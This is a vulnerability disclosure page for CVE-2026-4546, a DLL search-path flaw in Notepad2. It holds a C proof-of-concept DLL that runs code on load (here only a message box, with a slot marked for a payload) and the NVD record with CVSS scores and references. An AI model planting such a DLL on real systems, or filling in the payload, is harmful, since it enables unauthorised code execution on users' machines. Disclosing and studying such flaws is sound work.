CVE-2026-4546

// PoC for CVE-2026-4546: Uncontrolled Search Path in TextShaping.dll // Compile as TextShaping.dll and place in Notepad2.exe directory #include <windows.h> // Export a dummy function to simulate the missing DLL interface __declspec(dllexport) void DummyExport() {} BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: // Code execution starts here upon loading MessageBoxA(NULL, "CVE-2026-4546 Exploited: Malicious DLL Loaded!", "PoC", MB_OK | MB_ICONWARNING); // Payload execution would go here break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; }

{"cve": {"id": "CVE-2026-4546", "sourceIdentifier": "[email protected]", "published": "2026-03-22T14:16:34.383", "lastModified": "2026-04-30T14:25:11.943", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in Flos Freeware Notepad2 4.2.25. This impacts an unknown function in the library TextShaping.dll. Executing a manipulation can lead to uncontrolled search path. The attack is restricted to local execution. The attack requires a high level of complexity. The exploitability is said to be difficult. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se ha identificado una debilidad en Flos Freeware Notepad2 4.2.25. Esto afecta a una función desconocida en la biblioteca TextShaping.dll. La ejecución de una manipulación puede conducir a una ruta de búsqueda incontrolada. El ataque está restringido a la ejecución local. El ataque requiere un alto nivel de complejidad. Se dice que la explotabilidad es difícil. El proveedor fue contactado tempranamente sobre esta divulgación pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:H/Au:S/C:C/I:C/A:C", "baseScore": 6.0, "accessVector": "LOCAL", "accessComplexity": "HIGH", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 1.5, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-426"}, {"lang": "en", "value": "CWE-427"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:flos-freeware:notepad2:4.2.25:*:*:*:*:*:*:*", "matchCriteriaId": "7F9353EF-AE2A-46D0-A3D9-0368BD060444"}]}]}], "references": [{"url": "https://drive.google.com/file/d/1w5-ztNIN28mPuidtjlsilKsKKQQNOiIJ/view", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://vuldb.com/?ctiid.352373", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://vuldb.com/?id.352373", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.774778", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}}